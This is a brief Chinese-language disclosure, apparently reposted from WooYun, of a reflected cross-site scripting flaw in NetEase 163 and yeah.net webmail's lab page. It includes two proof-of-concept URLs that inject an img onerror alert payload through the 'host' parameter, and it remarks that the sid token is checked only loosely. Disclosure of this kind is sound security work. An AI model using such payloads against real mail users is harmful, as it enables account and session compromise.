网易系列邮箱实验室功能模块非持久型跨站~只测试了163、yeah邮箱均存在,估计其他系列的邮箱也存在。因为要用户登录情况下才触发。所以此处我把邮箱名用user代替!另外sid令牌即使随便给一个值可以弹框框,不知道这个令牌检查是否严格。这个也算一个 漏洞 吧~
漏洞证明:
http://lab.mail.yeah.net/labweb/lab.do?m=lab&keyfrom=jisu_new.index&sid=IBOviSNbVkMpAEsswnbbgMrCKVvNwOMz&uid=user@yeah.net&host=webmail.mail.yeah.net%22%3Cimg%20src=x%20onerror=%22alert%28/xss/%29%22/%3E&ver=js4&style=1&skin=163blue&color=005590
http://lab.mail.163测试数据/labweb/lab.do?m=lab&keyfrom=jisu_new.index&sid=IBOviSNbVkMpAEsswnbbgMrCKVvNwOMz&uid=user@163测试数据&host=webmail.mail.163测试数据%22%3Cimg%20src=x%20onerror=%22alert%28/xss/%29%22/%3E&ver=js4&style=1&skin=163blue&color=005590
作者Cryin@乌云
查看更多关于网易邮箱跨站及修复方案 - 网站安全 - 自学php的详细内容...